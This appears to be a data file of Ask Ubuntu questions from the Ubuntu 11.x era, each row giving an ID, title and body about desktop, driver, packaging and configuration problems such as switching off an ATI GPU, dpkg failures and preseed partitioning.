96983	how to completely shutdown ati card	i would like to know how do i prevent my ati card from turning on when i enter on ubuntu 11.10 . my bios only lets-me shutdown intel hd card or leave the both on but i want to know if is possbible to completely shutdown without having to access to the bios . ( if is possible to turn of without using vgaswitcheroo even better ! ) my system is : acer 3820tg -- intel core i3 350m , 2.26 ghz l3 , ati mobility radeon hd 5470 up to 2138 mb hyper memory , 13,3 '' hd led lcd , 4gb ddr3 , ssd corsair 60gb sata 2 . edit : i now know what is missing on the answers ! what only i had to do was : i edited /etc/rc.local file and added the next lines : sleep 6 echo on > /sys/kernel/debug/vgaswitcheroo/switch echo igd > /sys/kernel/debug/vgaswitcheroo/switch echo off > /sys/kernel/debug/vgaswitcheroo/switch and then save the file and restart . it was n't need to do anything more . it should be possible to use only the intel card now . by the way , i did n't blacklisted the radeon driver because doing it make my ati card wake up . ( use it at your own risk . i only tested in my system ) second edit : for those using this to use the intel card , pay attention because adding the sleep 6 to /etc/rc.local might disable your sound card making ubuntu only show a dummy card in sound settings ( i noticed this problem in ubuntu versions after to 12.04.2 hardware stack enabled version ) . to fix this you need to remove the sleep 6 .
96986	single card draw & infinite redeals in aisleriot 's version of klondike ?	i like to play a specific variation of solitare that aisleriot does n't seem to offer . i found a single card draw version of klondike , but it limits redeals and i found a three card draw that has no limits on redeals . i like to play single card draw with no limits on redeals . is this possible with aisleriot or do i need to go find another program ? draw-style redeal-limit available ? 1 3 yes 1 none no -- this is what i want 3 3 no 3 none yes
96987	firefox opens random urls - which i have not accessed before	i use firefox for browsing , ubuntu - 11.04 . off lately it is behaving strangely . when i open a new instance of the browser , it opens random urls in new tabs which i have not visited before . does any one know why this is happening ? could it be a virus ? i thought ubuntu was virus free . are there any good antivirus software for ubuntu ?
96992	how can i control banshee	i just started using banshee ( in fact , just started using ubuntu ) , and can not figure out how to control banshee . i have no menu bar . i read instructions on the internet about how to click on media , or click on help , and so on , but i have no `` media '' or `` help '' to click on . just a bare interface . i can close it , and i can open it , but ca n't do anything else with the music player .
96994	cryptkeeper icon does n't show up in the tray ?	i 'm trying to encrypt a folder , but the cryptkeeper icon does n't show up in the tray . i 'm not sure why . i 've tried changing the whitlist to `` all '' , but that did n't work . how do i get cryptkeeper to show up in the tray ? or , what would be an alternative to cryptkeeper ?
96995	screencast 1024x768 , what is the recommended encoding ?	using ubuntu 10.04 lucid , what is the recommended encoding for a screencast recorded at 1024x768 ? the tools i used were recorditnow ( kde package that works great on gnome ) and openshot video editor . i had to convert the ogv to avi using mencoder in order to have it load in openshot successfully .
96999	ubuntu cant detect my video card ( nvidia gtx 560 )	i 'm currently using ubuntu 11.10 and its a fresh install , i 've already installed nvidia drivers through the terminal sudo apt-get install nvidia-current.. but ubuntu still cant detect my current video card , here 's a photo :
97007	ubuntu 11.10 hangs while booting and goes black	while booting ( but after choosing ubuntu 11.10 ) , the screen looses signal and i can not do anything . this is new on my machine . i always shut it down properly . i have a x1300 video card . what is the problem ?
97009	wireless on dv1000 works while installing but not while using	that 's it . when i install ubuntu ( and xubuntu ) i can use the wireless of the hp dv1000 for download packages , but after the installation is ready and it comes to the real work..fail it is like i wouldnt have a wireless adaptor , there is not any connection or anything where i can see that i have a wireless device ... what could be the problem ?
97010	where is the login screen wallpaper located ?	i want to know this because i like the picture used and i 'd like to use it elsewhere . where is the lightdm login screen wallpaper located in ubuntu 11.10 ?
97021	failed to parse adb version -wrong elf class	my pc configuration : ubuntu 11.10 version 64 bit , eclipse 3.7 , android sdk i tried hard to remove adb error but itsms not working and showing following errors : /platform-tools/adb : error while loading shared libraries libncurses.so.5 : wrong elf class : elfclass64 i even set all path for android set correctly but it wont works .
97023	why ca n't i import `` pygtk '' with python 3.2 from pydev ?	i have installed eclipse + pydev + python 3.2 . now i have two python interpreters in pydev : python 2.7 and python 3.2 . if i try to execute command import pygtk with 2.7 interpreter it works fine , but with python 3.2 it raises importerror : no module named pygtk . how can i get pygtk to work with python 3.2 ?
97031	how to transfer files from windows to ubuntu instaled on vmware ?	i have installed backtrack ( an ubuntu based linux ) on vmware and i have a file on main host ( win 7 ) which i want to send to this virtual machine . what should i do ?
97032	on win xp , ubuntu one picks `` wrong '' homefolder	i 've installed ubuntuone on a win xp laptop connected to our company network . ubuntuone does n't let me sync folders on my local drive , but insists on me picking them from a network `` home '' folder which i do n't use at all . checking the settings , the ubuntuone folder is however set to `` always in sync '' . am i just misunderstanding the error message ? since i came to understand that nothing outside the ubuntuone folder can currently be synced on a windows system , should n't the message rather be telling me about the restriction to that folder - instead of : `` you can only choose folders on u : \ `` ? thanks for your help - i 'm still a beginner with ubuntu .
97035	how to see results after updating .gtkrc ?	i need to tweak my gtk2 theme . currently i edit the gtkrc file , then go to system > appearance > customise , change the widgets to something else and then back again to see the effect . this is slow and clumsy . is there a command or something to trigger all gtk2+ windows to udpate ? or , is there a gui editor where the results can be previewed immediately ? ( like firebug for gtk2 ? )
97036	how do i install javahl _without_ pulling in all the openjdk stuff ?	on my linux box ( oneiric , 64bit ) i 'm running eclipse and java straight from the eclipse/oracle tarballs . i 'd like to install the javahl subversion libraries , which according to the subclipse wiki are packaged in the libsvn-java package , but if i do an apt-get install libjava-svn apt-get will pull down all sorts of dependencies related to openjdk , which i do n't really care for . i 'm not that familiar with apt-get too . is there a way around this ? can i just install the shared libraries , without all the other stuff ?
97037	ubuntu ca n't detect all windows drives as well as external drives	ubuntu has been running well on my dual boot system until today . now i ca n't detect either external drive or my internal winxp drives when before all i have to do is mount . are there any commands or procedures to restore access ? i 'm new to linux . i love how quick and easy it is to navigate with . i 'm using ocelot on my i7 and lubuntu on my older centrino duo laptop . until today i never had a problem with ubuntu 11.10 . intel i7-870 2.93ghz 4gb ram 1tb / 1.5tb hdds geforce 430 asus p7h55m mobo
97039	how to install a new graphic card without xserver	i'v bought a new graphic card and installed it on my pc . now - ubuntu wo n't load , all i get is a command line terminal at the end . i 've tried to type startx and got this error : nvidia ( 0 ) : the nvidia gpu at pci:2:0:0 in not supported by the 173.14.30 nvidia driver nvidia ( 0 ) : failed to initialize the nvidia graphics device . screen ( s ) found , but none have a usable configuration . now what do i do ? how can i get x up and running again ?
97046	is there a way to hide the messaging tray in gnome shell ?	i find the messaging tray ( the bottom bar ) in gnome shell rather inconvenient . i 'm looking for a way to disable it . krsna 2 zed seems to have written an extension for doing just that , but i do n't know how to install it . any help would be appreciated . i 'm using ubuntu 11.10 32-bit .
97049	messed up gcc/build-essential - how to revert ?	i have some strange problems regarding my build setup ... acutally i am trying to compile # include < stdio.h > int main ( ) { printf ( `` hello world ! \n '' ) ; return 0 ; } by running gcc -o simple simple.c but this gives some errors . first about cc1 not being found , after adding the path to $ path i now get the error : /usr/include/stdio.h:34:21 : fatal error : stddef.h : no such file or directory long text , short question : how to delete all related stuff and reconfigure everything ? i tried : apt-get purge build-essential & & apt-get install build-essential gcc g++ but this does not help/work ! thank you for your help !
97050	how to escape ` $ ` and ` # ` symbols in bash ?	i have a simple string i want to echo from my bash script : $ ( document ) .ready ( function ( ) { $ ( ' # cf-footer-paragraph ' ) .append ( ' < p > revision 12345 < /p > ' ) ; } ) ; but any how i try to add \ before # i cant echo it= ( so i wonder - how to echo such command ?
97053	weather indicator does n't launch after startup	i 've got 2 problems with weather indicator in ubuntu 11.10 with unity . 1 ) the weather indicator does n't launch after starting up the system . 2 ) the icon which is supposed to show clouds or a sun etc . shows a question mark insted .
97054	`` could not unlink /var/run/tor/control : permission denied '' on tor start from vidalia	i updated tor to latest ppa version yesterday and it gives this when starting tor : jan 20 14:00:08.147 [ notice ] tor v0.2.2.16-alpha ( git-61e0079ab25db6c3 ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux i686 ) jan 20 14:00:08.147 [ warning ] controlport is open , but no authentication method has been configured . this means that any program on your computer can reconfigure your tor . that 's bad ! you should upgrade your tor controller as soon as possible . jan 20 14:00:08.147 [ notice ] initialized libevent version 1.4.13-stable using method epoll . good . jan 20 14:00:08.147 [ notice ] opening socks listener on 127.0.0.1:9050 jan 20 14:00:08.147 [ notice ] opening control listener on 127.0.0.1:9051 jan 20 14:00:08.148 [ notice ] opening control listener on /var/run/tor/control jan 20 14:00:08.148 [ warning ] could not unlink /var/run/tor/control : permission denied jan 20 14:00:08.148 [ notice ] closing partially-constructed listener socks listener on 127.0.0.1:9050 jan 20 14:00:08.148 [ notice ] closing partially-constructed listener control listener on 127.0.0.1:9051 jan 20 14:00:08.148 [ warning ] failed to parse/validate config : failed to bind one of the listener ports . jan 20 14:00:08.148 [ error ] reading config failed -- see warnings above . it seems the problem is the line that says : jan 20 14:00:08.148 [ warning ] could not unlink /var/run/tor/control : permission running vidalia as root gives these : jan 20 20:56:08.495 [ notice ] tor v0.2.2.16-alpha ( git-61e0079ab25db6c3 ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux i686 ) jan 20 20:56:08.506 [ warning ] controlport is open , but no authentication method has been configured . this means that any program on your computer can reconfigure your tor . that 's bad ! you should upgrade your tor controller as soon as possible . jan 20 20:56:08.507 [ notice ] initialized libevent version 1.4.13-stable using method epoll . good . jan 20 20:56:08.507 [ notice ] opening socks listener on 127.0.0.1:9050 jan 20 20:56:08.507 [ notice ] opening control listener on 127.0.0.1:9051 jan 20 20:56:08.507 [ notice ] opening control listener on /var/run/tor/control jan 20 20:56:08.507 [ warning ] /home/ariyan/.tor is not owned by this user ( root , 0 ) but by ariyan ( 1000 ) . perhaps you are running tor as the wrong user ? jan 20 20:56:08.508 [ warning ] failed to parse/validate config : could n't access/create private data directory `` /home/ariyan/.tor '' jan 20 20:56:08.508 [ error ] reading config failed -- see warnings above . strange thing is running tor demon has no problem and works ! but stopping it and running via vidalia causes these problems ! what is the problem ? how can i fix it ? thanks
97055	sync unity config between computers	i 'm using ubuntu 11.10 both at work and at home . i 've made a nice config ( from compizconfig-manager like shortcuts , no animations , speedy desktop wall navigation , etc ) at work and i want to use it also at home . so i need to find a way to sync the unity configurations from work and home both using 11.10 ... i 'm using ubuntu one and it would be nice if i could sync the computers with it.. is there a way to do this without copying config files every time i modify the shortcuts on one computer ? if no.. then what files do i need to copy to preserve the unity key-binding/animations , etc. ? thank you very much : d unity rocks
97058	package operation failed - help	whenever i try to update or install programs i get the `` package operation failed '' message . here 's whats it says in the details section : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 242146 files and directories currently installed . ) removing gparted ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... processing triggers for hicolor-icon-theme ... setting up couchdb-bin ( 1.0.1-0ubuntu17 ) ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /var/lib/couchdb -g couchdb -s /bin/bash -u 116 couchdb ' returned error code 1 . exiting . dpkg : error processing couchdb-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of desktopcouch : desktopcouch depends on couchdb-bin ( > = 0.10.0-0ubuntu3 ) ; however : package couchdb-bin is not configured yet . dpkg : error processing desktopcouch ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of desktopcouch-ubuntuone : desktopcouch-ubuntuone depends on desktopcouch ( = 1.0.8-0ubuntu1 ) ; however : package desktopcouch is not configured yet . dpkg : error processing desktopcouch-ubuntuone ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : couchdb-bin desktopcouch desktopcouch-ubuntuone error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up couchdb-bin ( 1.0.1-0ubuntu17 ) ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /var/lib/couchdb -g couchdb -s /bin/bash -u 116 couchdb ' returned error code 1 . exiting . dpkg : error processing couchdb-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of desktopcouch : desktopcouch depends on couchdb-bin ( > = 0.10.0-0ubuntu3 ) ; however : package couchdb-bin is not configured yet . dpkg : error processing desktopcouch ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of desktopcouch-ubuntuone : desktopcouch-ubuntuone depends on desktopcouch ( = 1.0.8-0ubuntu1 ) ; however : package desktopcouch is not configured yet . dpkg : error processing desktopcouch-ubuntuone ( -- configure ) : dependency problems - leaving unconfigured i also tried doing this but still got an error : joshua @ oneiric : ~ $ sudo dpkg -- configure -a [ sudo ] password for joshua : setting up couchdb-bin ( 1.0.1-0ubuntu17 ) ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /var/lib/couchdb -g couchdb -s /bin/bash -u 116 couchdb ' returned error code 1 . exiting . dpkg : error processing couchdb-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of desktopcouch : desktopcouch depends on couchdb-bin ( > = 0.10.0-0ubuntu3 ) ; however : package couchdb-bin is not configured yet . dpkg : error processing desktopcouch ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of desktopcouch-ubuntuone : desktopcouch-ubuntuone depends on desktopcouch ( = 1.0.8-0ubuntu1 ) ; however : package desktopcouch is not configured yet . dpkg : error processing desktopcouch-ubuntuone ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : couchdb-bin desktopcouch desktopcouch-ubuntuone any idea on whats wrong and how to fix this ? apparently it has something to do with couchdb-bin , desktopcouch , and desktopcouch-ubuntuone
97068	livecd is asking for password after booting ; default login details do n't work	the ubuntu live cd is asking for a password after booting in gdm . the username `` ubuntu '' and an empty password do n't work . normally the same cd never asked for a password . what is happening ? what is the correct password ? i badly need the live system ! edit : none of the proposals at https : //answers.launchpad.net/ubuntu/+question/9193 worked .
97074	how to rotate one monitor and keep compiz ?	i was able to rotate one out of two monitors while using the latest nvidia driver ( 290.10 for linux-x86_64 ) , but the guide calls for using xinerama which according to some is not compatible with compiz . true enough , after restarting the rotation works ( even in the login screen ) , but i ca n't start compiz anymore : $ compiz -- replace -- display :0.0 -- sm-disable & compiz ( core ) - fatal : no composite extension launching fallback window manager xlib : extension `` randr '' missing on display `` :0.0 '' . is there any way to have all of the following : compiz effects one rotated monitor drag windows between monitors
97075	`` no root filesystem '' error when preseeding	i am trying to perform automatic installation of ubuntu server ( 11.10 ) . my partitioning recipe is here : d-i partman-auto/disk string /dev/sda d-i partman-auto/method string lvm d-i partman-lvm/device_remove_lvm boolean true d-i partman-lvm/device_remove_lvm_span boolean true d-i partman-auto/purge_lvm_from_device boolean true d-i partman-auto-lvm/new_vg_name string vg00 d-i partman-auto-lvm/guided_size string max d-i partman/alignment select cylinder d-i partman-auto/choose_recipe select boot-root d-i partman-auto/expert_recipe string \ boot-root : : \ 228 8000 256 ext2 \ $ primary { } \ $ bootable { } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext2 } \ mountpoint { /boot } . \ 100 7000 1000000000 ext4 \ $ primary { } \ $ defaultignore { } \ method { lvm } \ device { /dev/sda } \ vg_name { vg00 } . \ 322 5000 1000000000 ext4 \ $ lvmok { } \ in_vg { vg00 } \ lv_name { root } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { / } . \ 4096 6000 4128 swap \ $ lvmok { } \ in_vg { vg00 } \ lv_name { swap } \ method { swap } \ format { } . \ 1024 4000 1088 ext4 \ $ lvmok { } \ in_vg { vg00 } \ lv_name { tmp } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /tmp } . \ 10240 3000 10256 ext4 \ $ lvmok { } \ in_vg { vg00 } \ lv_name { usr } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /usr } . \ 5120 2000 5168 ext4 \ $ lvmok { } \ in_vg { vg00 } \ lv_name { var } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /var } . \ 153600 1000 1000000000 ext4 \ $ lvmok { } \ in_vg { vg00 } \ lv_name { home } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /home } . d-i partman-lvm/confirm boolean true d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true i always end on error : no root file system is defined . please correct this from the partitioning menu . error_msg by choosing continue i just receive the same screen again . syslog messages : jan 20 13:00:02 debconf : -- > metaget partman-lvm/text/in_use description jan 20 13:00:02 debconf : < -- 0 in use by lvm volume group vg00 jan 20 13:00:02 debconf : -- > get partman-auto/method jan 20 13:00:02 debconf : < -- 0 lvm jan 20 13:00:02 debconf : -- > metaget partman/text/scsi_disk description jan 20 13:00:02 debconf : < -- 0 scsi % s ( % s , % s , % s ) ( % s ) jan 20 13:00:02 debconf : -- > metaget partman-auto/text/automatically_partition description jan 20 13:00:02 debconf : < -- 0 guided partitioning jan 20 13:00:02 debconf : -- > metaget partman-md/text/configure_md description jan 20 13:00:02 debconf : < -- 0 configure software raid jan 20 13:00:02 debconf : -- > metaget partman-lvm/text/configure_lvm description jan 20 13:00:02 debconf : < -- 0 configure the logical volume manager jan 20 13:00:02 debconf : -- > metaget partman-crypto/text/configure_crypto description jan 20 13:00:02 debconf : < -- 0 configure encrypted volumes jan 20 13:00:02 debconf : -- > metaget partman-iscsi/text/configure_iscsi description jan 20 13:00:02 debconf : < -- 0 configure iscsi volumes jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/lvm_lv description jan 20 13:00:03 debconf : < -- 0 lvm vg % s , lv % s jan 20 13:00:03 debconf : -- > metaget partman/text/scsi_disk description jan 20 13:00:03 debconf : < -- 0 scsi % s ( % s , % s , % s ) ( % s ) jan 20 13:00:03 debconf : -- > metaget partman/text/undo_everything description jan 20 13:00:03 debconf : < -- 0 undo changes to partitions jan 20 13:00:03 debconf : -- > metaget partman/text/end_the_partitioning description jan 20 13:00:03 debconf : < -- 0 finish partitioning and write changes to disk jan 20 13:00:03 debconf : -- > metaget partman/choose_partition choices-c jan 20 13:00:03 debconf : < -- 0 jan 20 13:00:03 debconf : -- > set partman/choose_partition 90finish__________finish jan 20 13:00:03 debconf : < -- 0 value set jan 20 13:00:03 debconf : -- > subst partman/choose_partition choices 20auto__________auto , 25md__________md , 30lvm__________lvm , 35crypto__________crypto , 40iscsi__________iscsi , 55divider_up__________divider , 60partition_tree__________/var/lib/partman jan 20 13:00:03 debconf : adding [ choices ] - > [ 20auto__________auto , 25md__________md , 30lvm__________lvm , 35crypto__________crypto , 40iscsi__________iscsi , 55divider_up__________divider , 60partition_tree__________/var/lib/partman/devices/=dev=mapper=v jan 20 13:00:03 debconf : < -- 0 jan 20 13:00:03 debconf : -- > subst partman/choose_partition descriptions guided partitioning , configure software raid , configure the logical volume manager , configure encrypted volumes , configure iscsi volumes , , lvm vg vg00\ , lv home - 153.6 gb linux jan 20 13:00:03 debconf : adding [ descriptions ] - > [ guided partitioning , configure software raid , configure the logical volume manager , configure encrypted volumes , configure iscsi volumes , , lvm vg vg00\ , lv home - 153.6 gb linux device-mapper ( linear jan 20 13:00:03 debconf : < -- 0 jan 20 13:00:03 debconf : -- > input critical partman/choose_partition jan 20 13:00:03 debconf : < -- 30 question skipped jan 20 13:00:03 debconf : -- > go jan 20 13:00:03 debconf : < -- 0 ok jan 20 13:00:03 debconf : -- > get partman/choose_partition jan 20 13:00:03 debconf : < -- 0 90finish__________finish jan 20 13:00:03 debconf : -- > get debian-installer/locale jan 20 13:00:03 debconf : < -- 0 en_us.utf-8 jan 20 13:00:03 debconf : -- > capb align jan 20 13:00:03 debconf : < -- 0 multiselect backup progresscancel align plugin-terminal plugin-detect-keyboard jan 20 13:00:03 debconf : -- > input critical partman-target/no_root jan 20 13:00:03 debconf : < -- 0 question will be asked jan 20 13:00:03 debconf : -- > go volume group and logical volumes are successfully created . i spent almost two days with testing and googling . now i really dont know what should i try now . thanks for any help .
97078	ubuntu wo n't display if boot not viewed	i am using ubuntu linux 11.10 . currently , i have windows xp on one computer , and ubuntu on another . i switch between the with a vga box that allows me to switch which computer is connected to my monitor . for some reason , if i am viewing windows xp while ubuntu is booting , the screen will be black when i switch back over to it . i have waited 15 minutes on this screen , and nothing happened . i have also tried to `` wake it up '' by moving the mouse and using the keyboard . ubuntu boots fine if it is connected to the monitor when it boots . does anyone know what could be causing this ? the output of lspci -nn | grep vga is : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82915g/gv/910gl integrated graphics controller [ 8086:2582 ] ( rev 04 )
97079	mysql is not starting xampp on ubuntu	i have recently migrated to ubuntu and i have intalled xampp for ubuntu .. lampp as per the instructions mentioned on xampp website , i have installed the lampp lampp installation and it was starting good.. when i changed the /opt/lampp permission mode to 777 by using from terminal as chmod 777 /opt/lamp . after this when i start the lampp , it gives the below error in images in terminal as well as web page error terminal error image web page error when i typed localhost/phpmyadmin it gives below error so , how can i revert the changes or how can i start the mysql server service
97081	can a person contribute directly to the ubuntu project ?	i know that ubuntu receives funding via support , merchandize , hardware company agreements , etc , but many projects out there offer the option to donate directly allowing and supporting further development and releases . is that option available for ubuntu ? how can i donate to ubuntu if that is an option i would like to follow ?
97084	how do i make an application appear in the dash ?	i have an app that i downloaded to ~/documents/app-name . how do i make it appear in the dash ? symlink it somewhere ? if yes , where ? ( if i symlink the file in /usr/bin it is found with the alt-f2 ( `` run '' ) search-box . but not the default one. ) what 's the correct way to do it ?
97090	xubuntu : screen idle-dims after lock+new login although not idling	i set my screen to dim after 2 minutes idling on battery in xfce power settings . if i lock and click new login , and log in as another user , the screen will dim after 2 minutes even though that second user is active . is there some setting or workaround for this ? it feels like a bug , but i have no idea what program or combination of programs would be responsible âś ( i do n't know if this affects unity users or not . )
97093	unity dash completely empty all of a sudden . howto fix ?	when i open my dash in unity ( ubuntu 11.10 upgraded from 11.04 ) , it looks completely fine . once i start typing though , all entries vanish and the dash is completely empty . it worked fine yesterday . any ideas how to fix that ? ca n't think of anything , i changed . here are some screens : edit : of course i tried this to no effect : sudo apt-get purge unity & & sudo apt-get install unity
97099	how to create videos for websites ( personal blog , youtube.. )	i am going to start making ubuntu tutorial videos again but this time around i will like to know what is the best format for uploading videos to my personal blog or to youtube . in the past i was using xdiv with avi container . but now i want the communities experience with this and i am looking for : the best or most recommended/used program to edit videos that comes with ubuntu or has a ppa for ubuntu . the best codec that has a very good quality but at the same time makes the video 's size smaller . as point 1 , it should come with ubuntu or have a ppa for it . this is a tough one for me since i am looking for a good one that shows good quality and good size . it has always been difficult for me to find the ideal one . the best format or container for this type of videos . i get confused between ogv , mp4 , mpg and which one offers better stuff . in all 3 cases the software should be open source and i will be using/recommending firefox and chrome for the websites , so it will be limited to the technology that this 2 browsers can work with ( not ie friendly ) . the videos , if this help in some way will be captured with gtkrecordmydesktop since i find it , it delivers the best quality with several i have tested . if i am wrong please , with all do respect correct me . after the video is made i will start using the editor and codecs asked in the 3 questions above . what i will be capturing is most of the time the desktop but also some screens of virtualbox for showing 11.10 and 12.04 installation procedures . apart from this some games running in wine and some games running natively will also be showed ( 0 ad , ufo : ai.. ) . i do not know if this will affect what codec will be recommended but i put this here as a bonus just in case . any help will be appreciated . thank you .
97106	windows keep moving as if i did alt+click	it happens frequently , and it 's driving me crazy : i 'm using my touchpad and - for example - scroll through a list , and suddenly , the window will `` jump '' so that it 's centered around my cursor , and it will follow my cursor ! basicly , it acts as if i just did an alt+click ( and drag ) , while i have n't touched the alt key . and my cursor is n't positionned on the title bar ! as far as i can remember , it only happens on windows that are not maximized . but there is worse ( not sure if it 's related ) : sometimes , when i double-click inside a window , the window will go from maximized to `` normal '' state ( not minimized , just a small resizable window ) ! i 've also experienced a similar issue where orange `` move '' arrows would appear on windows ... randomly ! i managed to disable that through ccsm - > disable grab handles . and finally , ( again , not sure if it 's related ) , my touchpad is n't always very responsive : sometimes , when i want to double-click , i need to 4x-click ( very rapidly ) . sometimes , my cursor wo n't move for a second or two ( i 've already disabled `` disable touchpad while typing '' ) just like with the double-click issue ... when i need to click something , i need to click 2/3 times before it works . every now and then , i ca n't `` drag '' stuff . happens mainly when i want to resize window panels and such . the cursor will stop moving after my first attempt . it will start moving again ( but not dragging ! ) after i smash my touchpad a few times to release my frustration . : - ) ps : i `` click '' with a tap on the touchpad , not with the actual left button . there are no hardware issues : under windows , touchpad works perfectly . edit : these days it seems like a ctrl+v is done when i move my finger over my touchpad ! ! i do not touch my keyboard when this happens ! i think it mainly happens when i move ( accidently or not ) over the vertical scrolling zone of my touchpad ( the zone to the right ) , but i never manage to actually reproduce the bug ! it 's really annoying as it makes me waste time in situations where i quickly need to log on , write/code and log back off ! edit2 : if it may be of any use , here 's the output of synclient . it contains a lot of information , not sure if it 's relevant : http : //pastebin.com/n8k3tcqh would there maybe be a way to `` import '' those settings from windows ? i highly appreciate any suggestion . thanks a lot .
97108	super + w & shortcut application access	super + w is great . but after all windows get displayed , i have to either click on one with my mouse or use the arrow keys . it would be better if each window turned into a letter , so i could access it quickly . anyone know if this is possible ? thanks .
97111	better sound with alc883 possible ?	i have an onbaord-soundchip : intel corporation 82801h ( ich8 family ) hd audio controller codec : realtek alc883 codec : realtek alc268 the driver snd_hda_intel is installed and everything works `` fine '' . but the output is really bad . it sounds like an `` old radio . '' in my `` windows-times '' the sound was way better . i play also with alsa mixer . nothing became better . alsa-version : 1.0.24.2 is it possible to increase its quality ?
97112	what are the packages that should be installed in play on linux ?	what are the packages that should be installed in play on linux ? so i would have a windows like environment for gaming without all the fuss
97118	why are n't sidebar bookmarks overlayed with their folder icons ?	i 'm trying to figure out why my bookmarked directories ( on the left sidebar of the nautilus file browser ) do not have icons . from what i 've seen on random screenshots people have down arrow for downloads , a paper for documents etc . i even explicitly set an icon to dropbox directory to have an earth symbol . i tried enabling `` extra '' effects in visual appearance , did n't help . where 's the setting ? what do i need to modify ?
97120	how to change my account type from standard to administrator ?	i just re-installed my ubuntu 11.10 , and i accidently changed my account type from admin to standard and i do n't have a second admin account to change it back .
97123	install grub in another machine	my hard disk is /dev/sdb in machine b . later it should be used as /dev/sda in machine a . it contains the root partition / and boot directory /boot for machine a . is it possible to install grub in advance in machine b ?
97129	how do i revert from the nvidia driver to the unrestricted driver ?	installed ubuntu 11.10 on a gateway gt 5628 with a nvidia geforce 8500 gt graphics processor . was working fine until i attempted to update the driver ; now , after boot i get a blank/black screen . how can i revert back to the unrestricted driver from a terminal ?
97131	keep a program running in terminal	so i am well aware of nohup and suffixing commands with & to ensure that they go into the background . however if i run a graphical application - sometimes using neither seems to do the job . so what can i prefix a program/command with to ensure that it keeps running after the terminal is closed ?
97132	ubuntu oneiric suddenly beeps constantly	i have no idea what happened but sound just broke down on my lenovo e420s with an intel sound card . all of a sudden there is a constant beep that i can only shut off by muting the computer completely . i used the alsamixer via command line and determined the source is the `` beep '' device . although setting it to the minimum does not turn it off completely . i found the following in the syslog : jan 20 16:01:55 fo-tp-krbo pulseaudio [ 2192 ] : [ pulseaudio ] module-alsa-card.c : failed to find a working profile . jan 20 16:01:55 fo-tp-krbo pulseaudio [ 2192 ] : [ pulseaudio ] module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 29 '' name= '' platform-thinkpad_acpi '' card_name= '' alsa_card.platform-thinkpad_acpi '' namereg_fail=false tsched=yes ignore_db=no deferred_volume=yes card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . any ideas on how to fix this ?
97137	how can i link some device ( given by its device id ) with an specific firmware ?	imagine i have a new device which it 's not working on linux . i get its device id with lsusb : bus 001 device 003 : id1164:7efdyuan high-tech development co. , ltd imagine i know that this device will work with this firmware /lib/firmware/dvb-usb-dib0700-1.20.fw then i would like to create a rule or something that could tell the operating system that the device 1164:7efd must be loaded with the firmware dvb-usb-dib0700-1.20.fw i just want to link the device id with the firmware , so my device will work . is there any way to do that ? thanks
97148	is juju only for cloud usage ?	can juju be used on a single server to make it easier to deploy services like mysql and any other charms that are available ? i understand that it is a tool to deploy and manage huge cloud servers but can it just as well be used on a single server to utilize the simplicity of charms ?
97151	video reproduction problem	i ca n't understand why when i reproduce a sd or hd video in unity the image starts to split horizontally and stutters on panoramas , but i have a perfect image in gnome 3 ! ! ! can anybody resolve this because i love unity ! oneiric 11.10 on biostar tz68a+ , intel i5 3.3 ghz , 8gb ram , nvidia gt520
